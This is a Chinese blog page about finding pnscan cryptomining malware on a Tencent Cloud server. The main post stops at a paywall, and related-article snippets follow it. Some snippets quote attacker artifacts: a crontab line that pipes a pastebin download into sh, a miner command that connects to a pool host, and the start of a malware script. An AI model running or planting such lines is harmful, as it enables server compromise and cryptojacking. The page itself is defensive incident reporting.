排查腾讯云服务器被挖矿病毒【pnscan】挟持

最新推荐文章于 2024-06-20 09:36:38 发布
最新推荐文章于 2024-06-20 09:36:38 发布
阅读量6.4k 收藏 16
点赞数 4
分类专栏: 报错合集 文章标签: docker mysql golang
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanxindong0620/article/details/120511087
版权

一、问题发现

最新在使用腾讯云部署项目应用,具体方式为docker部署。今天早上发现腾讯云发来一条报警信息:
在这里插入图片描述
看到信息中说到攻击行为,怀疑是否中了病毒,决定排查一下问题。

二、排查过程

首先登录腾讯云服务器控制台,发现cpu占用率处于较高水平,接下来登录服务器排查。

1.使用last查看最近登录信息,没有发现什么特别信息;
在这里插入图片描述
2.使用history查看历史指令
在这里插入图片描述
此时发现所有的histroy都被清空,然而本人并没有更改过设置,昨天使用history还正常,此时立马引起了我的警惕。

3.查看/etc/passwd下的账户信息
在这里插入图片描述
此时发现多了一个叫hilde的用户。
此时尝试使用 usermod -L hilde锁定hilde用户,发现并没有权限。

最低0.47元/天 解锁文章
阿Q咚咚咚
关注
  • 4
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
腾讯云ubuntu服务器tomcat访问慢的原因分析及解决方法
09-15
在使用腾讯云Ubuntu服务器部署Tomcat应用时,可能会遇到访问速度异常缓慢的问题。这通常是由于多种因素导致的,包括但不限于网络延迟、系统配置、服务优化不足等。在本教程中,我们将深入探讨这个问题的原因,并提供...
uniapp对接腾讯云IM+音视频生成userSig
03-14
在用户登录时,客户端需要将userSig与用户ID一起发送给腾讯云IM服务器,以验证用户合法性。生成userSig的过程涉及到密钥管理、安全算法以及服务器端代码实现。 1. **安装uni-app和腾讯云IM SDK** 在开始之前,确保...
腾讯云服务器被黑客挂pnscan病毒排查
范大的博客
10-19 1433
腾讯云服务被黑客挂载病毒,CPU负荷过高且top无法查看
记录腾讯云服务器被植入pnscan挖矿病毒折磨的一天
weixin_61077098的博客
06-06 774
pnscan病毒非常狡猾,启动的进程号是动态的,导致不能轻易删除。还有文件删除后没多久又出现了多半是因为定时计划。虽然问题解决了,但并不知道服务器还有没有被修改的命令和一些恶意文件,如果不是很重要的服务器项目,建议备份数据重装服务器,并且不能轻易的把端口号防火墙放开,MySQL、redis等密码也要加大难度。2023年5月22日,建议大家直接重装系统,或者备份的镜像快照回滚。因为今天又出现30多次黑客的攻击,cpu直接100%,根本查不到恶意文件和进程号。所以直接重装!!!
推荐开源项目:pnscan - 并行网络扫描工具
最新发布
gitblog_00035的博客
06-20 362
推荐开源项目:pnscan - 并行网络扫描工具 项目地址:https://gitcode.com/ptrrkssn/pnscan 项目介绍 pnscan是一个专用于IPv4 TCP网络服务调查的工具。它由Peter Eriksson开发并维护,能够帮助你检测如SSH、FTP、SMTP、Web和IDENT等服务的版本信息。虽然目前不支持IPv6,但对IPv4的支持非常全面,是系统管理员和安全研究人...
腾讯云服务器被恶意挖矿处理建议----检测到存在待处理的恶意文件:/usr/share/xmrigMiner,威胁等级:严重,您的服务器疑似被黑客入侵,建议您及时确认,避免造成严重损失。
weixin_58622844的博客
08-09 2853
事情是这样的,前两天搭建微服务项目的时候需要用到服务器,第一天刚部署上项目,紧接着第二天就被黑客扫了,既没办法访问,也没办法远程连接。
记一次使用腾讯云服务器疑似被挖矿的经历及排查办法
The_real_undertaker的博客
05-30 478
当然,最后没有解决掉我的问题,因为我发现压根从mysql找不到那个线程,所以直接怀疑mysql进程有问题,应该是有狗子用mysql用户启动了一个进程,然后我以为是mysql服务器的进程,实际上是一个挖矿程序,好吧,破案了。综上,我发现在云服务器上,不管是勒索,还是挖矿,都跟mysql有关系,所以一定得做好安全防护,已知的就有,mysql数据库密码高强度;当时使用了top命令,发现高占用的程序时mysql,cpu应该是100,命令是一个奇怪的数字。最后,我把那个占用高的进程咔嚓了。通过top命令找到pid。
关于云服务器挖矿病毒入侵这件事的经过
Innocence_0的博客
01-31 393
关于云服务器挖矿病毒入侵这件事的经过
腾讯云服务器挖矿程序处理记录
wddddddsd的博客
03-08 2293
1.top 发现pid为12437,进程名为“redis2”的进程cpu占用197% 2.ps -ef|grep 12437 发现服务器中确实跑了挖矿程序 polkitd 12437 17122 99 13:22 ? 00:27:29 ./redis2 --donate-level 1 -o ve01.kieuanilam.me:5555 -u tt6re -p tt6r...
腾讯云原生最佳实践.rar
03-20
腾讯云提供了云监控TCEM和云日志CLS,实时监控应用状态,快速定位问题,提供故障排查和性能优化的支持。 8. **安全与合规**:云原生的安全包括应用安全、网络安全、数据安全等多个方面。腾讯云提供了全面的安全解决...
腾讯云发送短信消息!!
05-09
在IT行业中,腾讯云作为国内领先的云计算服务提供商之一,提供了丰富的云服务,其中包括发送短信的服务。这个服务在很多应用场景中非常关键,例如用户验证、营销推广、系统通知等。接下来,我们将深入探讨腾讯云发送...
腾讯云短信集成.rar
05-13
总结来说,集成腾讯云短信服务虽然看似简单,但在实际操作中可能会遇到各种问题,需要耐心调试和排查。通过理解腾讯云的接口文档和ThinkPHP的框架特性,可以有效避免这些问题,顺利完成集成工作。对于开发者而言,...
记录日志:腾讯云服务器遭遇挖矿病毒 清除操作日志
qq_44752800的博客
01-18 1259
你未必出类拔萃,但一定与众不同 12月16日下午16时许 腾讯云服务器部署项目时,项目不管上没上线,tomcat原本是启动的,但是非正常原因断开连接,结束 重新启动多次tomcat发现都会非正常关闭,查看服务器cpu使用率奇高无比,最高的时候一个达到97%的CPU占用率,发现不明进程正在运行,百度一下发现是挖矿病毒,还是两种;记录一下操作日志,方便以后再次清除; [root@VM-0-6-centos bin]# top -H top - 16:57:21 up 2 days, 1:57, 1 us.
记一次腾讯的云服务器被植入挖矿程序的历程
weixin_42184538的博客
09-11 1831
不幸中的三生有幸…在19年9.10教师节的晚上,在我购买的云服务器上发现了这个挖矿程序…略有点刺激…故事是这样的~ #最近写了一个小程序,在购买的乞丐版腾讯云服务器上跑起来了tomcat、redis、mysql… #怪事就这样开始了… #先是redis莫名其妙被杀掉… #接下来tomcat也莫名其妙的被杀掉… #redis怎么启动不出10min,他就悄无声息的没了…很神奇,日志也没有被杀掉的记...
服务器挖矿 未解决
qq_40567146的博客
09-04 792
连接阿里云服务器发现很卡,top 显示不出高占用进程,cpu100%占用。 crontab -l  发现有定时任务: */30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 地址打开找不到源码,根据网上资料操作:vim  /etc/ld.so.preload   删除其中内容 后执行ldconfig 再使...
服务器挖矿病毒了怎么办?
编码人生
11-22 7458
今天早上一起来,收到几十条阿里云发过来的短信,说的是6379端口已被禁用,好家伙从我redis的端口进行植入病毒对吧,接着登录服务器里面用top命令查看 发现一切都是正常的情况,那我们到阿里云控制台去查看当前实例的情况 果然不出我所料,挖矿程序疯狂压榨我的服务器,导致服务器cup占用率都到100%了 好的,写作素材又有了 首先我们知道服务器挖矿病毒了,一般情况下中了挖矿病毒,有些病毒入侵较深的话,关联到系统底层组件,是很难彻底清除的.从安全角度不建议继续使用这个系统,可以做好快照的前提下,通过重置系
Linux【问题记录 05】阿里云+腾讯云服务器挖矿木马 kthreaddk 处理记录+云服务器使用建议
Java与大数据相关实践内容分享!
11-24 2562
Linux【问题记录 05】阿里云+腾讯云服务器挖矿木马 kthreaddk 处理记录+云服务器使用建议
Linux【问题记录 03】阿里云+腾讯云服务器的 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒处理(5个详细步骤)
Java与大数据相关实践内容分享!
09-08 623
Linux【问题记录 03】阿里云+腾讯云服务器的 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒处理(5个详细步骤)
pnscan 挖矿蠕虫病毒处理记(二)
SRE运维 网络 系统 安全
10-19 1117
在一的文章中,扫描的程序讲解了,但是真正的Boss(pnscan 挖矿)还没有解决,接下来继续: 机器安装了阿里云的动态感知,扫描到挖矿程序。 查看文件,发现这是一个脚本,先不要急于清理,先研究它的运行逻辑,发现有检测机制,文件会自动下载,像这种,强烈建议做一个域名本地解释(hosts)。 #!/bin/bash setenforce 0 2>/dev/null ulimit -u 50000 sleep 1 iptables -I INPUT 1 -p tcp --dport 63.
【转】服务器挖矿病毒排查过程
05-25
服务器挖矿病毒是指黑客通过入侵服务器,利用服务器的计算资源进行加密货币挖矿。这种病毒的存在会导致服务器性能下降,甚至导致服务器崩溃。以下是排查服务器挖矿病毒的过程。 1. 检查CPU和内存使用率 服务器挖矿病毒会占用服务器的大量计算资源,导致CPU和内存使用率异常升高。通过检查系统监视器或者运行top命令,可以查看当前的CPU和内存使用率,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 2. 检查网络流量 服务器挖矿病毒需要与矿池进行通信,因此会产生大量的网络流量。通过检查网络监视器或者运行iftop命令,可以查看当前的网络流量,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 3. 检查进程列表 服务器挖矿病毒会在服务器上运行挖矿程序,因此会在进程列表中留下痕迹。通过运行ps命令,可以查看当前的进程列表,如果发现有可疑的进程,则很可能是服务器挖矿病毒导致的。 4. 检查系统日志 服务器挖矿病毒会在服务器上留下痕迹,因此可以通过检查系统日志来发现异常行为。通过查看/var/log/auth.log、/var/log/syslog等系统日志文件,可以查找异常登录或者异常命令执行的记录,如果发现可疑行为,则很可能是服务器挖矿病毒导致的。 5. 检查防火墙日志 服务器挖矿病毒需要与矿池进行通信,因此需要打开服务器的防火墙端口。通过检查防火墙日志,可以查看服务器上的网络连接情况,如果发现与矿池的连接,则很可能是服务器挖矿病毒导致的。 以上是排查服务器挖矿病毒的基本过程,如果发现服务器确实感染了挖矿病毒,则需要及时采取措施清除病毒,并加强服务器的安全防护措施,避免类似的攻击再次发生。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值